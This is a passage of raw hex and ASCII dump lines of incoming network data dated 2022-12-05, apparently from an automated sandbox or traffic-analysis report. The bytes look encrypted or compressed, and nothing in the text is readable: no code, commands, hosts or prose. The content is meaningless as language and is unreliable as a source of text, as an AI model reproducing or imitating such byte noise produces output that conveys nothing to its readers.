                                                                                                                                                                          Data Ascii: yAZTv>-WWD`D)f8,hGK{SQt3w."C:s_Y[yB=!!bB!8'9!{~o4}P-75/hOi]F{f}gP&_wQ=~BD8I^twVBCI\KONjKxAt(L
                                                                                                                                                                          2022-12-05 14:13:35 UTC10INData Raw: 55 b5 49 bc 1c d9 64 ce c2 51 80 95 b4 45 8c 25 5f 6b 36 07 a8 37 e6 0c a0 b7 37 31 85 2c e8 c2 c8 16 85 f2 30 cc 70 33 c0 e6 de 6a b9 5e 8f ea 83 96 6a f8 1d 18 04 02 05 f9 6e 54 9c 96 26 35 9e a5 09 24 20 a6 43 cd ff f7 13 67 7a 53 c5 5e 2c 12 5e bf 8d 48 aa cc e9 ae 49 5a c8 68 bf 60 fe 34 50 53 e5 6c bf 12 31 64 d9 f6 11 a5 a0 ce dc b0 85 62 a3 31 31 df 30 75 f6 cc bf 2d 58 df 0e bb 85 b5 85 16 3e 7d 36 38 57 49 0f aa b3 f7 de c4 03 0d b8 c7 4d 09 c3 60 0f ce 15 59 ea e8 67 7b fe fb 28 30 56 16 89 40 62 51 b6 f1 11 21 a3 dc ad 40 ba b4 10 e2 f2 9d e2 05 25 b2 b9 cd 87 63 b5 bd d2 7f 4c 0f 86 89 cf e4 c2 fc 16 43 32 f6 ef 78 f9 fd 39 fd 93 18 6a eb 32 00 07 26 09 1f 59 98 2c 64 65 99 01 d8 30 79 46 f4 3a 41 c4 69 cc a1 47 f5 3a ff 98 4f fb e8 58 95 7f
                                                                                                                                                                          Data Ascii: UIdQE%_k6771,0p3j^jnT&5$ CgzS^,^HIZh`4PSl1db110u-X>}68WIM`Yg{(0V@bQ!@%cLC2x9j2&Y,de0yF:AiG:OX
                                                                                                                                                                          2022-12-05 14:13:35 UTC14INData Raw: d0 25 73 1f 49 a5 35 22 7f 48 18 ca 60 3b b9 7f 34 50 76 5c 2d 6f bc 41 9b b9 71 95 2b e4 12 42 16 0e 88 65 af a7 76 50 c2 de 4b 55 a8 5a 9e a4 be ce 13 20 36 96 53 82 72 9b 76 eb a6 24 b1 42 de 28 76 93 16 0d fb b6 41 6c 12 06 5d d0 22 0c f6 57 8c 34 7b 45 59 c1 59 7b 7b c1 c6 3f 9f d2 7e f2 0a b2 86 ca 47 42 ee 8f 03 36 30 f4 0a b7 c4 0d b9 1f 24 5f fd 78 50 7c 89 a1 c0 a7 c5 9e 43 b4 ef 96 29 f8 00 51 e6 3c 10 99 fb c7 c9 62 44 04 d1 0a 10 74 bc b3 68 c0 44 16 bb 25 53 c4 b2 44 0f 29 8f e8 5a 71 71 2c 0a 9b 07 42 31 90 a1 fc 90 37 8a 1a e6 21 09 d5 e3 12 1e a3 de 98 99 05 85 74 40 cf 2c 5c 82 72 5b bd 5d 77 b3 f8 f5 75 59 b9 c8 1d 40 d1 8e 2f f8 22 d2 9f 45 9e 18 be 3e 11 8e 25 68 8b 47 e5 dc ce b0 1c 08 d5 0e b5 da 18 ad 6c 15 07 58 94 0e 64 dc cf 7e
                                                                                                                                                                          Data Ascii: %sI5"H`;4Pv\-oAq+BevPKUZ 6Srv$B(vAl]"W4{EYY{{?~GB60$_xP|C)Q<bDthD%SD)Zqq,B17!t@,\r[]wuY@/"E>%hGlXd~
                                                                                                                                                                          2022-12-05 14:13:35 UTC18INData Raw: d1 96 65 9a a0 1d 34 19 36 85 34 bb 4f aa 36 93 21 bc b8 0f 12 2d 64 de 68 ff fa ab 0e 0c 8f be 80 43 09 dc 1c 24 df 2e fb 04 47 64 b4 d5 0c 42 e3 3a 92 e0 a2 c6 9d 56 96 17 6b 99 0c 1e f1 28 59 15 09 d7 30 8b 31 56 94 4b 14 81 33 9e 74 86 2d a5 0e 76 e8 3c 2c 5b f6 68 36 ad 99 0c 42 48 f8 7c 16 e3 3b fc 32 22 5b a6 77 a1 b9 af f4 b6 88 09 8a 37 18 ec c6 43 59 9d 60 e3 46 73 5a da 27 8f 4c b4 dd 64 b3 2f 34 d2 aa f3 bd f4 6d da 29 03
                                                                                                                                                                          Data Ascii: e464O6!-dhC$.GdB:Vk(Y01VK3t-v<,[h6BH|;2"[w7CY`FsZ'Ld/4m)
                                                                                                                                                                          2022-12-05 14:13:35 UTC18INData Raw: ec 8e bb a1 ca 31 26 8c 00 63 d2 6b dc 9a ae 52 2a 5e 3b 60 09 e6 72 fe 47 53 b5 cb 11 06 5b 4b 76 f2 3e ae 40 37 92 7a 36 e8 12 a5 ac 6d 81 fb 0b 2b c9 50 5b 73 7c bd 0d e3 96 6f 83 ea 22 82 25 11 5d 61 38 3a 7c 94 6a ed 61 e0 af 69 85 d9 f6 3d d4 1a 12 11 61 22 85 07 76 11 77 79 5b b2 a3 24 eb 6b 48 94 61 88 5b e2 eb 45 54 17 88 3f 5b 3c 66 3b 9e 75 60 02 d0 3c 7a 2d 5e 1b 81 0e 61 46 48 59 58 15 04 d9 c2 6e 5d d1 d6 5b 22 ab 1a ca c1 93 03 5b 2e 5b 42 c1 fb 4a 4e 09 04 59 a9 1a fa c9 04 e6 7f bf dc 83 aa 9c 51 c7 4b 6c 9d a7 14 53 74 91 a3 6f b8 c4 2d c7 2a 21 98 aa 62 49 71 d5 41 f3 61 f4 2c 05 0b 48 f5 25 3d 1c 1e 05 24 0a 89 f5 23 b3 a4 01 6e 05 fb 53 9b 63 3d a9 bc d4 8d a9 74 79 04 54 db a9 1d a7 04 2b 00 4f 57 ae 8a 6f 04 43 6b 11 6c dd 52 a2 7b
                                                                                                                                                                          Data Ascii: 1&ckR*^;`rGS[Kv>@7z6m+P[s|o"%]a8:|jai=a"vwy[$kHa[ET?[<f;u`<z-^aFHYXn]["[.[BJNYQKlSto-*!bIqAa,H%=$#nSc=tyT+OWoCklR{
                                                                                                                                                                          2022-12-05 14:13:35 UTC19INData Raw: 42 cc f7 2c 32 60 72 79 5b a8 ee 7a 35 84 79 23 76 6d c9 6e 85 f0 a7 44 32 b4 05 98 7a 95 2a f5 59 5b 26 57 b7 fa ed f4 74 cf a1 38 7b 21 01 3c d7 9f 69 7f 9f 86 05 eb 74 17 27 31 87 b0 f4 0f b5 ba 20 da 68 32 9e 5f 9c 0c ff 3d 50 f6 da 8a dc d0 86 42 32 0b 71 17 e3 c2 fa 78 cb 1e 71 3d 4a 4d b1 f9 d2 d2 80 5b a3 fd ea d9 38 19 cc 8a d9 0e 00 58 66 52 f5 18 f5 c9 0e 81 5b 81 89 20 d9 44 55 fd d2 d1 51 88 a8 97 cb 54 ca e4 4c 9b 4f 7e da 0a d1 c1 13 f3 7a 5f 82 8b d1 98 9b 16 83 77 f6 cb 51 10 fc d0 c6 d1 85 3f e8 23 af e7 25 34 97 12 5f 6f df d2 02 0d a6 a4 23 6a e4 26 82 3b 77 bf 67 47 f0 08 24 ca 7b 46 93 81 a9 3f 75 44 33 59 86 eb 4d ca e2 cd f7 22 11 d3 f5 f1 6d 37 94 09 f1 81 4e 1d a3 6d 9b cb 64 bb 46 37 0e 3c b2 32 6f 8b 46 d5 c9 4d a7 b0 60 b2 b0
                                                                                                                                                                          Data Ascii: B,2`ry[z5y#vmnD2z*Y[&Wt8{!<it'1 h2_=PB2qxq=JM[8XfR[ DUQTLO~z_wQ?#%4_o#j&;wgG${F?uD3YM"m7NmdF7<2oFM`
                                                                                                                                                                          2022-12-05 14:13:35 UTC20INData Raw: e2 6e f9 05 50 af 12 42 ca bb 69 4e 0a 23 50 93 70 2c 62 d1 b1 e0 78 2b 82 5a e9 4f bb 4f db b2 c8 52 83 60 8d e2 c9 1e 73 da 68 4b 71 fc 6c 62 85 88 c8 5a d6 d7 6b 22 f8 02 f4 68 08 24 53 97 96 cd 08 0c 00 49 2c 00 3f 80 62 aa 0a 57 4b 73 f6 df 42 20 af 43 e3 23 27 a9 39 56 62 c5 c1 18 7c 1e 5d 77 df a9 b0 c6 42 ba 3b f2 5c 41 a5 7c 53 23 75 fd f1 1e c3 ae 25 d7 d9 ca 55 65 34 d9 fa 73 28 1d cc a2 00 14 79 93 8b 3c b0 e3 92 51 99 29 b5 2f a4 90 2f 5b 97 5a a3 ca 58 49 d5 f3 65 25 3c bf 0b 46 44 e0 c8 cc 4c 77 7b 76 bd 13 1b 3d 6f 21 0f 5c 97 59 f8 45 be c4 c4 8b 16 54 c0 67 e0 ab c8 bb d7 b6 bc 79 6e 77 d1 fc c8 5f 2a fa d6 6d 7e e2 96 c5 dd f4 14 a5 f7 f9 4e 29 2c a6 06 25 91 c9 d4 8f fa 25 c7 b8 db 4e c4 6a 47 b9 39 8a c9 2c 18 82 73 87 f0 8a b6 9f f2
                                                                                                                                                                          Data Ascii: nPBiN#Pp,bx+ZOOR`shKqlbZk"h$SI,?bWKsB C#'9Vb|]wB;\A|S#u%Ue4s(y<Q)//[ZXIe%<FDLw{v=o!\YETgynw_*m~N),%%NjG9,s
                                                                                                                                                                          2022-12-05 14:13:35 UTC21INData Raw: 28 85 50 4b 90 d5 5b fe 94 44 0a 0d f9 4c ce 86 25 3f aa db b2 d0 52 02 a0 6e 03 ff f9 bd e7 b6 12 24 64 06 8f 68 6a 7d fd 6e 38 56 13 aa 76 2d 7a ed 5e 71 4a 77 7a b0 bc bb 49 88 04 0b ae cd 23 6e a4 53 3a 68 8e b6 10 7b 58 ff 6c 48 f2 b4 17 ac db 91 36 96 8e 58 3d ba 9e 64 2b b8 a0 a0 3f 31 0d 78 28 9a 47 e3 90 8d e5 f2 1e 0d 84 54 9a f4 b7 ff 18 66 9b 80 d0 4b 8d bd 0a fd 6f 0b 22 5f 76 32 f3 e2 af af f1 45 80 df f2 02 45 23 2c cc 06 b8 28 1d e7 12 c9 e1 81 12 52 9b d6 08 24 47 48 1a ec d4 31 99 b1 16 6e 15 1c 65 80 3a 90 17 37 3e d6 49 65 8e 57 ba 13 4d 8c 15 50 dd 1d 0b 5f 7e 94 3d 53 1f 0c 6e f7 25 5e bd 0d a2 f4 06 f1 44 53 18 1c 14 52 00 1e 9c 63 0f 94 76 ec 28 e2 05 58 1a f5 19 cc 92 86 a8 69 ff 12 4c 5a 4c a9 77 22 9e af d9 8e 73 20 f5 cd d2 26
                                                                                                                                                                          Data Ascii: (PK[DL%?Rn$dhj}n8Vv-z^qJwzI#nS:h{XlH6X=d+?1x(GTfKo"_v2EE#,(R$GH1ne:7>IeWMP_~=Sn%^DSRcv(XiLZLw"s &
                                                                                                                                                                          2022-12-05 14:13:35 UTC23INData Raw: 2b c5 76 d5 ae 31 13 da 39 62 3a aa 85 92 cd 40 2d db 15 18 dc c6 25 ce da 61 4e 14 5c 19 cb 96 83 f4 ae 76 1c d5 5a 5a fc 83 fe b0 3e 78 80 cb 35 25 9a 2c 51 c3 55 63 08 2d 3b bd 25 cc 84 34 47 48 71 c8 5d 80 c0 34 0b ba 5d 2c 0e 5f 4a 12 82 90 32 13 76 3a 4f 8f 94 67 6e 2d 02 d9 a1 de fb 03 49 58 60 93 e8 80 09 0b 4f 1b 41 01 2d 06 4b 25 2f f8 1e e1 09 6a 1d af 40 93 06 c7 7a 76 21 98 63 ac f8 93 e7 9f 85 62 83 79 0b 95 2a 60 89 65 f6 1e fc dd dc ea cc 28 0e c4 ce 87 83 01 24 9d 44 c3 15 a9 2d 74 1b 23 1a 09 c3 2a 8d 63 e0 2f 47 4a 87 86 6c 85 02 d1 36 e5 a2 58 aa c7 0a fd 1d 70 29 e1 09 02 a8 07 25 d2 11 95 d9 ad 8c a7 04 71 68 6f 19 d3 88 fd 51 a5 14 bd ea 92 4f 6b 4e 8e 41 74 22 e0 0c d3 a0 6e 90 00 d2 45 f1 55 50 55 cb fe 16 bb a2 66 13 51 0a 8c 51
                                                                                                                                                                          Data Ascii: +v19b:@-%aN\vZZ>x5%,QUc-;%4GHq]4],_J2v:Ogn-IX`OA-K%/j@zv!cby*`e($D-t#*c/GJl6Xp)%qhoQOkNAt"nEUPUfQQ
                                                                                                                                                                          2022-12-05 14:13:35 UTC24INData Raw: 7b 82 bd d2 6f 64 bf 4d d4 d4 ea eb 33 15 86 7b 68 82 8e d9 14 f4 ff 9a d8 fd de c8 dc 16 b8 04 d4 37 40 93 36 b0 fc 6b 47 5d 70 8a a4 59 e6 bd 8b da 49 26 a6 bd dc df 28 6a 57 5a 8e 49 fa 6a 83 8a 2c 9d af 0c eb f8 cd 3f 73 32 2b 18 63 40 d5 eb 0a d6 44 0a 4a e4 df 31 bb d5 10 7e 18 f9 85 19 b9 67 dd 99 b6 9d 9b b3 89 8d c4 07 11 50 60 c8 a0 1c 90 8d 0b 6f a7 ce ac f8 03 77 7e 63 91 a5 e6 09 ea 5d 02 eb 70 ab 50 5a cb 0d d3 30 ff 7a a2 cf f4 4e ec 60 46 a3 ec 96 f7 67 19 ae 5f 17 3c d1 47 96 4d 1d e5 e4 f2 4d 15 ff 8f cc 57 1a b8 7f d3 9b 63 73 f5 13 e1 8d 2e e6 fa 49 96 f0 cf c3 1f 09 7e 29 34 59 f7 d9 59 c3 cb 0f d8 b4 d5 a4 65 57 8c fb 04 ff 1c 81 f9 45 70 08 b5 c1 8d 90 44 9b c9 4f 77 5e 0b c7 38 1e e8 8e b7 68 3d de 28 d7 a5 59 db b8 c6 d3 09 1e e5
                                                                                                                                                                          Data Ascii: {odM3{h7@6kG]pYI&(jWZIj,?s2+c@DJ1~gP`ow~c]pPZ0zN`Fg_<GMMWcs.I~)4YYeWEpDOw^8h=(Y
                                                                                                                                                                          2022-12-05 14:13:35 UTC25INData Raw: c3 19 bd 4c ef 6d de bb d9 4f ff a1 d1 bc bd 64 f3 bb c7 86 40 fc df 78 c1 5f f4 90 b8 cc be 63 8d cf 4c 86 45 a7 a0 57 87 32 08 0e e5 74 11 19 fe 56 be 52 dc 31 a1 1f 89 05 dd dc d7 da b5 7e a4 10 b6 f9 8e 74 e8 d9 96 93 ef bc 1c 43 5d 3b ee 8c fc 38 97 5d eb 27 f8 bc ac 4c ab 03 95 3d 3d 6b 26 8e d9 0d 94 40 d5 dc b6 1e fb c5 29 b1 15 e9 c0 4a 42 37 2e 7a 58 93 0d 2c 9d 86 38 41 64 8c 5e cc ce bc 4c 81 95 3b c3 de 4e 08 14 43 dd 29 6d db fc a7 53 11 3c b0 fc 7f 26 a1 7f e9 4b 27 52 20 ef 61 48 a8 a9 ac 00 0a 15 7b aa 6d 84 52 a3 4b 88 43 76 43 8f c6 8e 8e 3a 63 51 44 a0 ce bc d5 b4 ad 53 e7 aa 4b c0 5b de 45 ef 2c de 8a 5b b1 a1 70 c2 fc 30 bf 78 8a e8 57 a0 fa 20 f5 14 2c 4e f0 40 c4 06 11 cc 05 e2 eb 23 95 26 3c 4b 04 3e fc 19 88 90 cf 0f ae ce 52 14
                                                                                                                                                                          Data Ascii: LmOd@x_cLEW2tVR1~tC];8]'L==k&@)JB7.zX,8Ad^L;NC)mS<&K'R aH{mRKCvC:cQDSK[E,[p0xW ,N@#&<K>R
                                                                                                                                                                          2022-12-05 14:13:35 UTC26INData Raw: b7 17 71 b2 58 f1 49 e0 7f 07 2b 52 54 a0 09 00 1a 54 5e 7c 82 13 6f a4 3c 8a db ad 26 02 70 0d 42 f2 d6 2d e6 d8 08 77 ad c0 64 93 8f 5d 79 3b da 90 66 ca c1 3e 59 b8 e4 26 b0 df f9 b5 03 c1 b9 bf e1 87 c1 31 4b 6b f4 e7 0d 58 c4 57 3f 81 ac b0 b7 e0 c4 0a b8 63 0a 5c e5 09 db ff ca 62 99 a9 d6 16 25 87 01 25 da 24 4f f8 a7 01 cb ea 0b c3 f5 49 fc a8 ab 8b a7 d7 e5 9f 15 71 d8 11 19 de 81 f1 5b 05 49 f8 cb 1b 80 64 5f a7 a3 27 58 ed 1a e1 7a 15 b6 3f 0c 5d 30 13 b7 61 45 24 be 05 a9 f8 3f d7 58 9e b4 f7 4d aa 46 1b 49 81 64 dd cc 17 df 94 e8 a7 f4 de d2 59 99 7b fd 12 a9 42 9b ba ee fa f8 51 91 f7 ad d5 21 04 b4 a8 a9 15 c5 71 66 50 13 a7 1c 41 ad b9 b1 d4 77 37 ca 15 9f 19 3e b4 17 d7 18 60 f2 75 8b 55 54 58 9d 4c 80 49 06 8f b5 6f 64 b0 ef 22 eb 75 0e
                                                                                                                                                                          Data Ascii: qXI+RTT^|o<&pB-wd]y;f>Y&1KkXW?c\b%%$OIq[Id_'Xz?]0aE$?XMFIdY{BQ!qfPAw7>`uUTXLIod"u
                                                                                                                                                                          2022-12-05 14:13:35 UTC27INData Raw: 64 e0 d9 17 a3 0a d7 da 36 61 21 dd d4 4d da 31 49 be 42 7c 5b 18 d5 15 2e f3 f5 20 6d c9 04 d7 2a 61 8d fd 88 51 1a f9 d6 8d 15 9f 05 dc f7 f2 ce 55 da 35 87 be 13 97 ef a6 41 86 9e 03 82 9c b5 94 d8 13 b4 ed 7d b6 79 a7 f0 a1 aa ce 5e 2f d3 07 1d c3 6e d2 5b 5f 59 24 91 bb 92 f2 f6 81 62 fd 76 26 74 c2 3b 33 35 ee 1b f5 fd 58 5e 8c 00 19 11 8f 2c 9c 82 6f ee 0d 15 ed b5 29 a3 b7 9c 77 83 64 8a 4a c2 d1 50 45 a1 0d ea d5 c0 9a e4 c6 06 26 37 13 c4 b3 d8 81 3e c1 a8 53 c0 46 ba e6 5d 26 46 28 e8 ea 98 1a ea be 16 ed 0b db 3f 7e 56 6c 67 4d 86 2f 3c 76 ff 7b 8e 03 cd 79 b0 59 7e f5 71 f3 71 73 56 90 0f cc dd 54 84 09 ad 8b 71 91 53 07 68 56 09 38 de b5 e4 a8 a9 dd c7 d6 75 97 63 ba 9b 17 83 f2 98 5f f7 3e 31 b8 01 9f 8d 8d cd 8d 94 6c 02 9e 58 91 cb 09 4b
                                                                                                                                                                          Data Ascii: d6a!M1IB|[. m*aQU5A}y^/n[_Y$bv&t;35X^,o)wdJPE&7>SF]&F(?~VlgM/<v{yY~qqsVTqShV8uc_>1lXK
                                                                                                                                                                          2022-12-05 14:13:35 UTC29INData Raw: c5 c4 21 76 56 3b 74 62 89 7f 03 df 30 e0 60 7d 77 23 bf 7c 90 a7 d1 28 3c 5e 0d 8d 26 ca 59 fe 49 44 a6 57 1a 2a 90 f7 11 77 2b d1 b8 39 e5 d6 e8 3e 21 c0 5c d2 d4 76 71 1e db 56 c6 5e ea 3e c1 6d e8 a3 06 88 9d c8 40 5a 00 5f 08 fb 53 e5 1c 2e f5 62 45 81 52 7c 31 a2 8a eb 5a 28 0e 23 a0 c9 6a 46 68 6b b5 13 fd 74 76 cb 94 59 10 6e bc 2c 93 02 83 91 9f 9a 69 c5 c8 ae 35 ad 36 a0 a4 72 bd 69 46 ae 69 3e 02 98 e0 1d 86 a3 46 5a e2 c8 c8 ef fe 19 90 30 7f d7 a9 bf 75 c2 23 a7 cd fb bf af 1b 2d 37 18 25 15 79 e7 65 dd b3 c0 34 6c eb d5 88 01 45 ca 1e 93 3f 0e 36 5b 17 1a c0 6b 38 e7 fb ee b1 7d 7e 7d a6 4d 48 bc a9 fd 11 02 98 89 6f e1 ee e7 b8 b0 dd 2b 60 87 46 89 d1 25 ba e8 4b b7 d5 f3 25 28 c7 43 1b 66 24 6c 66 93 be 35 ef 2f 91 b8 9b f6 e3 2e 20 04 a4
                                                                                                                                                                          Data Ascii: !vV;tb0`}w#|(<^&YIDW*w+9>!\vqV^>m@Z_S.bER|1Z(#jFhktvYn,i56riFi>FZ0u#-7%ye4lE?6[k8}~}MHo+`F%K%(Cf$lf5/.
                                                                                                                                                                          2022-12-05 14:13:35 UTC30INData Raw: 0e 23 fc b4 a5 40 33 a9 fb 09 cf cd 55 4c fb a0 fb 0d 7f 93 29 e1 81 de 7e e3 54 63 54 fe d5 69 6b b4 58 48 86 81 25 08 5a 3e 90 ea a6 82 38 93 37 3d 10 ab 4b c5 24 88 cf 58 c4 5f 94 09 da 3b f0 47 50 89 44 87 2c 37 aa ed b4 a4 5a 45 d6 ed a2 9c b3 df a2 40 05 3d 1f c4 ea ba 42 07 78 61 7d 13 7d 58 c2 89 9e a4 b4 7c 7e 37 ef 09 c6 2d d4 48 a5 c5 ae b0 e6 d8 39 17 56 4e ba cf 6a 9c b7 53 30 72 ec 67 24 8f 0f ce e7 3b cb ac 5e c4 e0 cd 3e 34 be d7 89 b0 5d d5 78 57 66 d9 9f 55 cc 1b a3 e1 62 df 1c 88 2a 5b f6 41 5e bb 72 48 7d 9d 6d 0b 23 cb 72 71 6c e9 d7 1c 67 f9 3c 40 fc 51 f7 ee b4 6a 35 64 9b 05 5f b1 f6 8a ac 83 51 1c c5 df 08 d0 4e 3a 7f c2 7c d4 73 fc 4d 0f d9 fd f8 ab ad 16 ca 29 f2 88 1a b8 9d 4b 5f 64 9a ef 2c b0 11 91 37 49 c5 fa fe cd 13 81 66
                                                                                                                                                                          Data Ascii: #@3UL)~TcTikXH%Z>87=K$X_;GPD,7ZE@=Bxa}}X|~7-H9VNjS0rg$;^>4]xWfUb*[A^rH}m#rqlg<@Qj5d_QN:|sM)K_d,7If
                                                                                                                                                                          2022-12-05 14:13:35 UTC31INData Raw: 54 87 10 0c 7f cf 14 d6 19 36 cb 5e 7e bb 8b 40 09 90 5a ac 79 d4 6a fa 59 f1 bf f9 28 a4 88 3d db 26 2a 5a a0 96 eb 45 5b 3c 15 76 1f 0d 37 41 1a 9e f1 90 64 9b 5d 69 ea c6 7c ef b2 cc c0 65 18 f3 0c 94 46 a9 b6 55 a7 3f ba ab 89 40 2e ce 15 55 81 f6 b4 c9 0e d0 1e 01 83 64 ff da 7b c4 54 0e 6c 20 7b d1 fd b6 ba bb 5e 25 ad 5d a0 13 af 41 08 63 ce 52 41 64 d2 55 c1 7e 57 a9 32 3e 2d 6f ed c8 16 04 34 bd b4 45 c4 fc 9e 27 96 1f ff 96 33 e2 23 e7 2b 78 80 68 dc 10 89 82 b6 a9 19 c8 d0 28 da 19 b4 f4 17 9c 32 ee 6a ea 38 77 45 d6 67 8d 25 7c 97 22 ba c4 92 25 2f ce 8b d5 e6 8f 9f ad c6 07 89 92 98 e6 41 91 35 03 71 a7 c0 73 84 55 a1 9a 7f e3 a4 c0 8b 91 2b 04 91 b0 41 80 b2 5e dd ed 09 33 d0 38 ca db 1d f3 29 c0 0d 39 a1 55 b4 5a 00 d7 91 1f 88 0f 07 90 b6
                                                                                                                                                                          Data Ascii: T6^~@ZyjY(=&*ZE[<v7Ad]i|eFU?@.Ud{Tl {^%]AcRAdU~W2>-o4E'3#+xh(2j8wEg%|"%/A5qsU+A^38)9UZ
                                                                                                                                                                          2022-12-05 14:13:35 UTC32INData Raw: 07 ee 48 db 73 e1 be 92 8e 49 11 3d ab b3 18 78 ed 7a 2b 6e a3 7f 60 95 69 b9 22 5e c2 4d e0 a5 41 74 e7 03 2d 8d 39 4e d1 a6 6b 9a ea 9d dd 4f 4a 08 77 73 00 93 e1 71 8f 72 42 ff 5e 0e ed e6 1c 5d 34 ea 95 fb 6c 3a f7 c4 79 fe f0 48 71 cc 33 3f 58 00 6e ce 78 82 d3 68 a0 e9 0a ab b2 ba 55 76 07 f6 ec 75 f0 8c 32 1d 72 16 8e 70 c9 0a 8d ec f4 21 48 09 a9 14 46 e1 f5 f8 f3 72 a9 76 a0 c5 6a 5b 07 ca a0 9a ea f9 8f 59 35 46 c2 67 88 59 aa 7d 33 55 59 1a ec 15 f8 46 fc 0b f0 3c 0f 9d d5 87 bb e9 32 1c 2b f2 9e a2 12 4c 83 49 88 16 11 f0 9a 3b 8b 81 62 7e e0 c2 da f8 48 bd 68 e6 ca 2b 79 d1 65 e8 58 76 21 93 8f 8c 43 8f 72 2b ee 71 cc 3c 8a e1 7f bc 22 11 67 30 4f 10 ff a4 fb c8 2a 4c d8 24 85 01 b0 80 39 4a c7 26 23 71 3a 84 4e 2d 2a f2 73 aa d5 a6 2d c7 5f
                                                                                                                                                                          Data Ascii: HsI=xz+n`i"^MAt-9NkOJwsqrB^]4l:yHq3?XnxhUvu2rp!HFrvj[Y5FgY}3UYF<2+LI;b~Hh+yeXv!Cr+q<"g0O*L$9J&#q:N-*s-_
                                                                                                                                                                          2022-12-05 14:13:35 UTC34INData Raw: 55 d3 70 08 40 8f 3e 21 ed 79 77 3b ef 42 77 d5 e7 ad c3 95 54 71 05 48 91 1a c2 f6 18 5c 8c 1e ea e9 cf b1 5c b6 67 b8 48 a6 e6 1c 85 ce b2 07 c2 46 bf bc 7b 50 4d f0 f9 e7 59 12 59 70 28 e5 c9 41 c2 77 33 27 3c 51 4a df cd 8f 53 af 91 a4 b0 06 5e 19 c3 e0 81 6f 51 20 38 59 02 2c a3 a4 8a 70 a1 81 25 70 70 94 5a 5b 50 c9
                                                                                                                                                                          Data Ascii: Up@>!yw;BwTqH\\gHF{PMYYp(Aw3'<QJS^oQ 8Y,p%ppZ[P
                                                                                                                                                                          2022-12-05 14:13:35 UTC34INData Raw: 7e 0c 1c 5d d4 69 f7 a2 fb 39 14 f9 52 a2 8b 79 60 e5 e6 b4 02 a5 6f 89 5d fc a2 47 01 94 b7 e3 a7 5f da 88 b5 92 22 c7 08 25 69 7e 16 02 b3 92 35 b3 f7 e0 52 df fe 83 62 d2 06 5e 00 0c 21 2b f3 9c 35 85 57 d6 1e e9 44 01 c7 90 63 96 f4 8a 93 24 5a 2d a9 16 29 cf f2 c9 f1 6b 0a 5f d4 ff 27 8a c5 2b 17 cf a2 eb 0a 1d 3d 10 bb e0 0c 2b 35 74 5e 0b e2 c2 cb 38 3a c3 93 58 38 10 48 9b ae c5 f2 3c ab 85 0c 81 60 40 de fe 0f 70 3b 43 a6 a6 c6 12 8c 61 62 09 52 92 75 15 20 db 48 5f 75 e1 fd 42 71 a4 b8 49 03 df 03 da 68 96 a2 2f 8d ae bc 21 1c 77 33 a8 90 7f 18 6c 45 5e de 17 9b 1d d3 dd 10 ce 0b 57 2e f5 4d 23 3f 37 58 d8 e9 d7 6d 36 af 74 9a 0c ad f4 92 3b 0f ea 62 70 bd fa fa c2 27 05 30 66 34 75 50 11 04 1c 0e 68 df 32 d1 0c 7f d9 c6 7f 24 18 ec 5a b3 45 56
                                                                                                                                                                          Data Ascii: ~]i9Ry`o]G_"%i~5Rb^!+5WDc$Z-)k_'+=+5t^8:X8H<`@p;CabRu H_uBqIh/!w3lE^W.M#?7Xm6t;bp'0f4uPh2$ZEV
                                                                                                                                                                          2022-12-05 14:13:35 UTC35INData Raw: 33 79 5d be 49 57 76 ef 8c 2f 99 fb fe 2c e1 0f f8 91 2e 58 d3 39 f4 f0 bc 8a 13 67 99 4b 78 0a e3 ce 06 f1 20 a0 d2 f6 61 25 62 4d ce d4 68 d5 13 46 ce ce b6 ef 17 1b e3 8b 40 18 bd 65 db 78 fd 61 5c ea 89 44 71 d9 fb c5 c1 38 62 55 e5 f0 b9 28 10 e0 a7 7b 93 94 4d 86 0f 66 c6 50 6c 75 93 a0 65 1a 01 34 33 60 7f d8 db f8 60 7f b9 82 be cf 9e f0 b8 fc 8b d0 3d 83 db 3f f6 18 e3 99 50 7f 5e 58 4d 29 73 4f f1 f9 28 dc 68 e4 d7 d8 48 cc 2c c0 55 ac af 23 3e 84 42 f0 38 c7 45 85 91 2d 5a ca 2c 95 69 56 24 ec bf 65 d6 7c 5b 0a 38 16 34 da df 07 25 73 0c c9 bd 79 90 3b 70 e4 40 eb b6 24 70 c0 93 87 d1 b3 5f fb 93 97 94 29 78 14 d0 4a 35 48 8e 9a e5 28 28 16 1c 27 fe 4e 78 dd f2 e8 2a ef ab f7 60 34 79 0f c5 a2 df c6 35 16 f9 d8 0b 02 8d 97 0c 72 68 dc c3 dc 7b
                                                                                                                                                                          Data Ascii: 3y]IWv/,.X9gKx a%bMhF@exa\Dq8bU({MfPlue43``=?P^XM)sO(hH,U#>B8E-Z,iV$e|[84%sy;p@$p_)xJ5H(('Nx*`4y5rh{
                                                                                                                                                                          2022-12-05 14:13:35 UTC36INData Raw: 5d 6b 02 54 5e 0d 38 dc c9 72 98 93 f2 23 79 67 d0 3c f3 a1 5e 05 3c 74 68 d8 25 0e eb 7d aa b8 dd cf 2e 9e c9 98 2f 4e 43 a5 52 61 9e 17 4a 39 e1 ae 3b 71 cd f4 fe 27 f8 b1 f9 8f 26 fb 5e 8d c0 92 d8 87 9b 28 75 8f fc 6a fa 5b 22 fc e6 c5 d9 92 5b ad f4 3e a1 da 19 93 06 d0 c8 93 f1 65 df cc 34 ba 18 1d e2 39 41 41 f9 d4 6e b2 87 fb 5d b8 72 a0 8e 29 83 5d 7f 44 56 fb 3e 1a 2b 63 d1 7a 3f 2e 5b fa 77 ac 58 12 57 a3 2d ff f4 8e cd 2f c9 29 5a ec 6d 9f ee 2e d0 72 fc da 89 8b 8b 24 e7 de f9 b5 06 ab 7a 48 d1 dd 65 90 46 42 14 33 7c 4c 13 d9 7c 51 ec d6 c7 64 71 90 27 50 a1 76 50 44 e1 28 c5 91 d0 7d 18 da 99 e6 a9 11 24 0f e9 5e fc 9c 6d e9 1d e4 79 7a a7 15 e6 e1 26 06 b2 95 22 54 3f 60 f0 2f f7 fc 12 d3 0c 73 23 a7 d0 33 19 af 4c 38 a6 e5 c7 3d 41 1c b1
                                                                                                                                                                          Data Ascii: ]kT^8r#yg<^<th%}./NCRaJ9;q'&^(uj["[>e49AAn]r)]DV>+cz?.[wXW-/)Zm.r$zHeFB3|L|Qdq'PvPD(}$^myz&"T?`/s#3L8=A
